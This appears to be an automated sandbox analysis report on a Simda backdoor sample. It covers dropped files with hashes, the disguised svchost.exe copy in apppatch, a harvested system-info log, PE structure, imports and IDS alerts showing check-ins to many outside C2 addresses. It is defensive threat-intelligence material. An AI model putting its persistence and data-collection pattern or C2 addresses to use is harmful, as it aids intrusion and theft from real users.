File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	162
Entropy (8bit):	4.43530643106624
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
MD5:	4F8E702CC244EC5D4DE32740C0ECBD97
SHA1:	3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
SHA-256:	9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
SHA-512:	21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\login[7].htm

Download File

Process:	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	4.43096450882803
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
MD5:	7A5DF79FBAAFF2C161C6E29461785403
SHA1:	89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
SHA-256:	B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
SHA-512:	19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\login[2].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with no line terminators
Category:	dropped
Size (bytes):	114
Entropy (8bit):	4.802925647778009
Encrypted:	false
SSDEEP:	3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
MD5:	E89F75F918DBDCEE28604D4E09DD71D7
SHA1:	F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
SHA-256:	6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
SHA-512:	8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
Malicious:	false
Preview:	<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

C:\Users\user\AppData\Roaming\374725562.zip

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	50609
Entropy (8bit):	7.84283463882289
Encrypted:	false
SSDEEP:	1536:Nr08lLgcl+VxecWK0NkUDW6mobPG32EM3/E7faLf:NrjlLgcOeceNk6be32bsjcf
MD5:	BF1D74EF1AF0938B3276A580421887F5
SHA1:	D2F2F321FB5A536C031FA15B41809DFEFED33F3B
SHA-256:	8AD80180E9DA4C24B0EDBD274FFEF85ABDFACB629713FEA3F7706386199E73FB
SHA-512:	5339FD264AD1479A9EC9DE14E2334DD1161DB8405E958A6F0033B3E1D02B272FDF97D51DB4A47B0FC1095961B73FDE061A62BCD59A0DE7ED34B5F8622944CFC8
Malicious:	false
Preview:	PK.........akYIWm.;...........debug_15;Nov;2024_18;56;47.logUT...................0.......... .".L...mB...T9..8.c..}'..XQ.h}...........y)C.........\.r].m..p..g.O..!L.=...fy.t....sc..M.XTr@.&..o.d.jm.R....8..J.a....UK....".6(.t..p4.o.ts.l`.......gh...:h.=D..h..$.......\|BG...Ev.#...(J..0 E.v.o..o.zV...R..fJ..J..r-...A.......9.}...^.{....+H.x.....!+...g]..\..Vf..A.&....V.u.+r....h8.....=..G....d..0...G1..(....R....".....m_..u.j.....$xa04..R.G.f..-...;<.n...\@.......W..d...,..V....U.r.......c..^z}.\|.\\|..E.X...Z.eg..j(.1.[..)....).clO..D...I....K.......U8..p2.{.Ot.p,s=[...Q+8...aw.Z`..U.. ...Y..K..2...rw....!....PK.........akYg,.rA...6.......scr.bmpUT.................O...'x:.n......&N. ...l...tr..*K&"cj.C..fA....t...9t...e-.f..J(..+%..t..O#.y..0lU5.T..9.u..T0.. ....=....s7wsss..O..ws....G..{....?.g7.....v.......'.C.o.....U/;...z........./z/~......i..[...[.n..........po....]..w..].}.n...P.[t....o.o....E......n.H.?..x...t.C..!.N.{?...H...n.!..C

C:\Users\user\AppData\Roaming\82c31ddd\debug_15;Nov;2024_18;56;47.log

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1806
Entropy (8bit):	5.368290279704914
Encrypted:	false
SSDEEP:	24:uXGtQiXNbyTyU0zc2i2LuiVGXZVV7RY6f6yZsosrOYXfVRXJsVRXDc3xw1zVbUlB:uyQyETudPSF9Xy/rJ+DAxw150nX7nN
MD5:	18DA123734464547FF2E1DF7908E2DD2
SHA1:	F0F6052794C80CF63F0F0557E03A18F1553ED795
SHA-256:	5167DD0293E236489D2E479E72849963E85F46CB0B8CC6A142D88286F50E9EBE
SHA-512:	C1FFA5D614BD10342D91A2074952BD0725AE5BBCB181BC01212560D057E81DC7EB22E488DB32E3D6FC2058BBA0AF38BCC70E504F8AE392E535111BC161D1E6DD
Malicious:	false
Preview:	ExceptionAddress = C:\Windows\System32\KERNELBASE.dll!RaiseException + 0x0062..ExceptionCode = 0x0000071A.Last error: 0x00000000..Context:.Eip = 0x7595CC12 Eax = 0x08DFF8E8 Ebx = 0x00000000.Ecx = 0x00000000 Edx = 0x003D1000 Ebp = 0x08DFF940.Esp = 0x08DFF8E8 Esi = 0x0000071A Edi = 0x086A6E18.EFlags = 0x00000246..Main module:.main 0x02C70000-0x00061000..ThreadStart = unknown!0x02c85590..CallStack:.C:\Windows\System32\RPCRT4.dll!RpcRaiseException + 0x003e.C:\Windows\System32\RPCRT4.dll!RpcErrorGetNextRecord + 0x0461.C:\Windows\System32\RPCRT4.dll!NdrAsyncClientCall + 0x04ea.C:\Windows\System32\RPCRT4.dll!NdrAsyncClientCall + 0x0553.C:\Windows\System32\RPCRT4.dll!RpcAsyncCompleteCall + 0x002c.C:\Windows\SYSTEM32\WINSTA.dll!WinStationRegisterConsoleNotification + 0x0422.C:\Windows\SYSTEM32\WINSTA.dll!WinStationQueryCurrentSessionInformation + 0x007a.C:\Windows\System32\RPCRT4.dll!I_RpcGetSystemHandle + 0x0ba5.C:\Windows\System32\RPCRT4.dll!I_RpcGetSystemHandle + 0x0b3d.C:\Windows\System32\R

C:\Users\user\AppData\Roaming\82c31ddd\scr.bmp

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	PC bitmap, Windows 3.x format, 1280 x 1024 x 8, image size 1310720, cbSize 1311798, bits offset 1078
Category:	dropped
Size (bytes):	1311798
Entropy (8bit):	2.8891642540019875
Encrypted:	false
SSDEEP:	24576:U1Ija75kOkgYJs5QLQdrS5WXoYYdbJb1HW3lCRQpW25LaokYbh2xkO9MfozIkuV8:U1Ija75kOkgYJs5QLQdrS5WXoYYdbJbx
MD5:	8A5CAEC641DE0DA5238780A4D91F78F8
SHA1:	D44B943D5E7D140AB7AF5A06C97FCE0BB41B6FD7
SHA-256:	490726C69F61A7BC61C743C254F6EE44ED6ABD604DAAB78EBB87CD1940A16FF2
SHA-512:	9A8AB5359B6A3BAC91C733312E92FBD00B4548B353A75A820E8EDBD8AA0777E4F26E3748BC08B0D8BBEA7CA2815345B20605D081C20A6E8133C807325AB827BA
Malicious:	false
Preview:	BM6.......6...(............................................................................... @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...@...`....................... ...@...`....................... ...@...`....................... ...@...`................@...@. .@.@.@.`.@...@...@...@...@ ..@ .@ @.@ `.@ ..@ ..@ ..@ ..@@..@@ .@@@.@@`.@@..@@..@@..@@..@`..@` .@`@.@``.@`..@`..@`..@`..@...@. .@.@.@.`.@...@...@...@...@...@. .@.@.@.`.@...@...@...@...@...@. .@.@.@.`.@...@...@...@...@...@. .@.@.@.`.@...@..@...@......... ...@...`.................. ... .. @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...@...`....................... ...@...`....................... ...@...`....................... ...@...`...................... ...@...`.................. ... .. @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...@...`....................... ...@...`...

C:\Users\user\AppData\Roaming\82c31ddd\sysinfo.log

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	6986
Entropy (8bit):	5.174383434457671
Encrypted:	false
SSDEEP:	96:esDyRgRZeMWuTeo4KIEIMIhrINImIBIDIhI+IbI6IFIUIxIBI8INItI9IfILIAIf:es+cYuP35CRzc6nclQ82
MD5:	DAB589EAB13900CADD6DCE1B76B9B4C6
SHA1:	05B081AFABAE3EEC2BB91FF70E57E36084E59E0F
SHA-256:	5832AFDCED472B1AFB3F8FBACF3E3B6CDFE3D7A2E96E59EA610AFB6E286D7584
SHA-512:	7929B9EDEA2EE8037797B0141617EFBEDD6DB1ED3107C847AB8A80E791FCCF86829DE2F55810484371E119D5FBC9EF4468AE7039001888C629CB575744C97C70
Malicious:	false
Preview:	{BotVer: 4.0.1}.{Process: C:\Windows\apppatch\svchost.exe}.{Username: user}.{Processor: Intel64 Family 6 Model 143 Stepping 8, GenuineIntel}.{Language: ENG}.{Screen: 1280x1024@32}.{Date: 15:Nov:2024}.{Local time: 18:56:47}.{GMT: -5:00}.{Uptime: 4d 8h 5m}.{Windows directory: C:\Windows}.{Administrator: true}.IE history:.{http://go.microsoft.com/fwlink/p/?LinkId=255141}.netstat.{Proto.Local address.Remote address.State.TCP.0.0.0.0:135.0.0.0.0:0.LISTEN.TCP.0.0.0.0:445.0.0.0.0:0.LISTEN.TCP.0.0.0.0:5040.0.0.0.0:0.LISTEN.TCP.0.0.0.0:27903.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49664.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49665.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49666.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49667.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49668.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49669.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49670.0.0.0.0:0.LISTEN.TCP.0.0.0.0:64111.0.0.0.0:0.LISTEN.TCP.192.168.2.6:139.0.0.0.0:0.LISTEN.TCP.192.168.2.6:49697.192.168.2.1:445.ESTAB.TCP.192.168.2.6:49703.40.126.31.73:443.TIME_WAIT.TCP.192.168.2.6:49706.2.23.209

C:\Windows\apppatch\svchost.exe

Download File

Process:	C:\Users\user\Desktop\Bpfz752pYZ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	1179648
Entropy (8bit):	6.468101862032136
Encrypted:	false
SSDEEP:	24576:+800kHPa2DfTNjx+mZCkt76f/24pN+XNqNG6hditW:R0riKf9Ckt7c20+9qNxUW
MD5:	AA278E2717BFC5593B570B9CC3D1270A
SHA1:	E8B47C74F5304FFB43029E35C678488AA21E9B3F
SHA-256:	66E88335CC7F33C2AB7F4C650199DBE98838828120CE099C81E702D422C1C57C
SHA-512:	8AEE9A00A975724F394A3B926F87FBA37A5F2EC59A41C8AAF1FF770A04A024233A382C07B84E440F43CC0C9EECEFDD550F3F94D4EE88956D2DDF02D1218472B2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".:.................2..........;........@....@...................................I.....................................R..........4............................................................................................................text...[0.......2.................. ..`.j......#k...P.......6..............@..@.nkytZ...............<..............@..@.N......hQ...P.......@..............@..@.fc.....&............N..............@....data....6...@...8...T..............@....s.......e..........................@....w..................................@....rsrc...4...........................@..@.reloc...............2..............@..B................................................................................................................................................................................................................................

C:\Windows\apppatch\svchost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Bpfz752pYZ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.468101782439391
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Bpfz752pYZ.exe
File size:	1'179'648 bytes
MD5:	a1699b125470c94380386d6c0cf106b3
SHA1:	5de240159b639483fb3674e6289e946e7c304293
SHA256:	d7db5171f51590f6eb1f7250eb75203b68ea0e9ba29a60457776338c5a9c9dc3
SHA512:	02f1b13d1f3d20e01525be2c56aa7a6fb4008f8fc20ffe04b19fa2499d2b0f5ceff9e1347ed86e21d14d8bf321fc91f5ee918d4a3164f649bf6fd582d7cef152
SSDEEP:	24576:f800kHPa2DfTNjx+mZCkt76f/24pN+XNqNG6hditW:00riKf9Ckt7c20+9qNxUW
TLSH:	92451241B3D954C0E2338A7798BAD72098B6BDAC5B30CE5F4394765D1DB32E1B839E06
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".:.................2..........;........@....@.................................^.z0...................................

File Icon


Icon Hash:	004ab5b5d5b59535

Static PE Info

General

Entrypoint:	0x401b3b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x3A11222E [Tue Nov 14 11:29:50 2000 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	616d060f84174fbe550615d295f4ce51

Entrypoint Preview

Instruction
mov ecx, 00000000h
mov eax, ecx
call dword ptr [004150F8h]
mov dword ptr [00424B42h], eax
xor eax, eax
xor ebx, ebx
sub ebx, 0000010Ah
jnc 00007F5468869D38h
add ebx, 00000D32h
mov ecx, ebx
shr ecx, 1
add ecx, esi
sub ecx, 00000222h
ror ecx, 05h
sub ecx, dword ptr [00425025h]
sub ecx, eax
sub dword ptr [00424AEDh], ecx
shr ecx, 1
add dword ptr [004250ADh], ecx
call 00007F546886AA84h
mov dword ptr [00424377h], eax
push 00000001h
pop edx
push edx
mov ecx, 00486F5Ah
mov ebp, 00071E7Eh
mov eax, ebp
sub ecx, eax
call dword ptr [ecx]
mov dword ptr [00424170h], eax
mov esi, 0020A87Ch
mov eax, esi
shl eax, 1
call dword ptr [eax]
mov dword ptr [0042424Eh], eax
or eax, eax
jne 00007F5468869D35h
mov edx, esi
dec edi
mov edi, 00000001h
mov eax, edi
push eax
mov ecx, 0020A86Ah
mov eax, ecx
shl eax, 1
call dword ptr [eax]
mov dword ptr [00425205h], eax
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov eax, ebp
push eax
push esp
pop ebp
sub esp, 14h
lea eax, dword ptr [004245CCh]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x15204	0xb4	.N
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5f000	0x29434	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x89000	0x3fe	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1b514	0x1c	.fc
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x305b	0x3200	746849c22bd1df3ec913e6afd3261c01	False	0.700703125	data	6.211906712870064	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.j	0x5000	0x6b23	0x600	0ac67a98e2d3f6254b28e45da115c69b	False	0.96875	data	7.160260489225009	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.nkytZ	0xc000	0x8a0b	0x400	a47b6a356a3431ac9df3442ebc526efb	False	0.728515625	data	5.978528077403749	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.N	0x15000	0x5168	0xe00	1dbd683313ed000c6b75f32744694ec5	False	0.47572544642857145	data	5.278775089069264	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fc	0x1b000	0x8d26	0x600	12c7d10915b83bfd9faa65fa82180001	False	0.736328125	data	5.748360690216942	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x24000	0x36c0	0x3800	9a257e09d714d8ab48b690e8453afbd6	False	0.81298828125	data	6.7672572781458635	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.s	0x28000	0x65bb	0x800	30f797c52e34fe45fded3dfd0de177a6	False	0.2587890625	data	2.075341234110115	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.w	0x2f000	0x2fd0b	0x800	1958d4f52ae8d506c6908df58c4a3a64	False	0.6533203125	data	5.386043783353626	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5f000	0x29434	0x29600	496540dfc12657aab2ce18ca319f7ae5	False	0.9770404550604229	data	7.967828924738939	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x89000	0x3fe	0x400	a91b09921b19daa6e0bdbe6b0aaccf90	False	0.939453125	data	6.753512294366748	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x5f310	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.4143996247654784
RT_DIALOG	0x603b8	0x50	data	English	United States	1.0
RT_STRING	0x60408	0x11a	data	English	United States	0.7304964539007093
RT_STRING	0x60524	0x114	data	English	United States	0.7282608695652174
RT_STRING	0x60638	0x10c	data	English	United States	0.7388059701492538
RT_STRING	0x60744	0x154	data	English	United States	0.6970588235294117
RT_STRING	0x60898	0x11a	Targa image data - Color 2 x 55 x 32 +42 +86 "\011"	English	United States	0.7269503546099291
RT_STRING	0x609b4	0x16e	data	English	United States	0.6857923497267759
RT_STRING	0x60b24	0x132	data	English	United States	0.7124183006535948
RT_STRING	0x60c58	0xfe	data	English	United States	0.7480314960629921
RT_RCDATA	0x60d58	0x27493	data	English	United States	1.0003480098188484
RT_GROUP_ICON	0x881ec	0x14	data	English	United States	1.1
RT_VERSION	0x88200	0x234	data	English	United States	0.5336879432624113

Imports

DLL	Import
kernel32.dll	SetLocaleInfoA, lstrcpyn, CreateNamedPipeA, GetEnvironmentVariableA, GetExitCodeThread, OpenEventW, GetLogicalDriveStringsA, CopyFileExW, SetPriorityClass, GetProcAddress, CreateMutexA, CreateMutexW, QueryPerformanceCounter, CreateThread, SetUnhandledExceptionFilter, OpenMutexW, GetExitCodeProcess, GlobalGetAtomNameA, GetFileTime, GetCalendarInfoA, MulDiv, CreateFileMappingW, CreateMailslotA, FreeResource, LocalFree, DeleteAtom, GetVolumeInformationA, RaiseException, AddAtomA, GlobalFindAtomW, RemoveDirectoryW, GlobalFindAtomA, CreateMailslotW, GetProcessHeaps, EndUpdateResourceA, CopyFileExA, CreateNamedPipeW, SleepEx, GetModuleHandleA, WaitForSingleObject, GetSystemDefaultLangID, SetEvent, TlsAlloc, SetCalendarInfoW, GetLastError, GetFileSize, lstrlen, DuplicateHandle, GetAtomNameW, GetStringTypeW, CreateFileA
USER32.DLL	CheckMenuItem, GetDC, DefDlgProcW, BringWindowToTop, GetDlgItem, EnumWindows, PeekMessageW, SetCursor, GetWindowLongA, MessageBoxIndirectW, CreatePopupMenu, keybd_event, GetWindowTextLengthA
gdi32.dll	CreateFontIndirectExA, CreatePolygonRgn, CreateDIBitmap, GetLogColorSpaceW, SetGraphicsMode, GdiGetBatchLimit, ScaleWindowExtEx, SelectObject, GetEnhMetaFileHeader, GetFontData, SetLayout, SetRectRgn, ExtSelectClipRgn, EnumFontFamiliesA, GetAspectRatioFilterEx, GetNearestPaletteIndex, PolylineTo, PatBlt, SelectClipRgn
ADVAPI32.DLL	RegEnumValueW, RegReplaceKeyA, RegCreateKeyW, RegQueryValueA, RegCreateKeyExA, RegReplaceKeyW, RegCloseKey
SHLWAPI.DLL	PathGetArgsW, ChrCmpIA, StrSpnW, PathAddBackslashW, PathIsUNCA, SHRegOpenUSKeyW, PathIsPrefixA, PathCompactPathExA
COMCTL32.DLL	FlatSB_SetScrollRange, InitCommonControls
winspool.drv	AddFormW, EnumMonitorsW, OpenPrinterW, GetJobW, DeleteMonitorA, EndDocPrinter, AddPrinterConnectionW, SetPrinterDataExW
INETCOMM.DLL	MimeOleParseRfc822Address, MimeOleParseRfc822AddressW, HrGetAttachIcon, EssSecurityLabelEncodeEx, MimeOleGetDefaultCharset, MimeOleGetFileExtension, HrAttachDataFromFile, EssKeyExchPreferenceEncodeEx, EssSignCertificateDecodeEx, MimeOleSMimeCapGetHashAlg, EssKeyExchPreferenceDecodeEx, MimeOleGetCharsetInfo, MimeOleGetCertsFromThumbprints

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-11T18:13:00.497567+0100	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	1.1.1.1	53	192.168.2.6	64197	UDP
2024-11-11T18:13:01.308489+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	49710	85.17.31.82	80	TCP
2024-11-11T18:13:01.323208+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	49711	18.208.156.248	80	TCP
2024-11-11T18:13:01.323321+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	49708	44.221.84.105	80	TCP
2024-11-11T18:13:01.331145+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	44.221.84.105	80	192.168.2.6	49708	TCP
2024-11-11T18:13:01.331145+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	44.221.84.105	80	192.168.2.6	49708	TCP
2024-11-11T18:13:01.331712+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.208.156.248	80	192.168.2.6	49711	TCP
2024-11-11T18:13:01.331712+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.208.156.248	80	192.168.2.6	49711	TCP
2024-11-11T18:13:01.341864+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	49709	208.100.26.245	80	TCP
2024-11-11T18:13:01.347944+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	49707	23.253.46.64	80	TCP
2024-11-11T18:13:01.419707+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	49713	44.221.84.105	80	TCP
2024-11-11T18:13:01.449028+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	49709	208.100.26.245	80	TCP
2024-11-11T18:13:01.552615+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58860	199.59.243.227	80	TCP
2024-11-11T18:13:01.608258+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58861	99.83.170.3	80	TCP
2024-11-11T18:13:01.668891+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58862	3.94.10.34	80	TCP
2024-11-11T18:13:01.676303+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58859	188.114.96.3	80	TCP
2024-11-11T18:13:01.724546+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58864	85.17.31.82	80	TCP
2024-11-11T18:13:01.813943+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58865	23.253.46.64	80	TCP
2024-11-11T18:13:01.832545+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	49712	154.212.231.82	80	TCP
2024-11-11T18:13:02.202308+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	49712	154.212.231.82	80	TCP
2024-11-11T18:13:02.572421+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58866	99.83.170.3	443	TCP
2024-11-11T18:13:03.080897+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58867	188.114.96.3	443	TCP
2024-11-11T18:13:03.442545+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58859	188.114.96.3	80	TCP
2024-11-11T18:13:03.832367+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58863	199.191.50.83	80	TCP
2024-11-11T18:13:04.769913+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58868	188.114.96.3	443	TCP
2024-11-11T18:13:05.642224+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58870	13.248.169.48	80	TCP
2024-11-11T18:13:05.646846+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58874	3.94.10.34	80	TCP
2024-11-11T18:13:05.669775+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	3.94.10.34	80	192.168.2.6	58874	TCP
2024-11-11T18:13:05.669775+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	3.94.10.34	80	192.168.2.6	58874	TCP
2024-11-11T18:13:05.769791+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58871	188.114.96.3	80	TCP
2024-11-11T18:13:06.077941+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58875	18.208.156.248	80	TCP
2024-11-11T18:13:06.462607+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58877	103.150.10.48	80	TCP
2024-11-11T18:13:07.771923+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58877	103.150.10.48	80	TCP
2024-11-11T18:13:08.078083+0100	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	192.168.2.6	58879	188.114.96.3	443	TCP
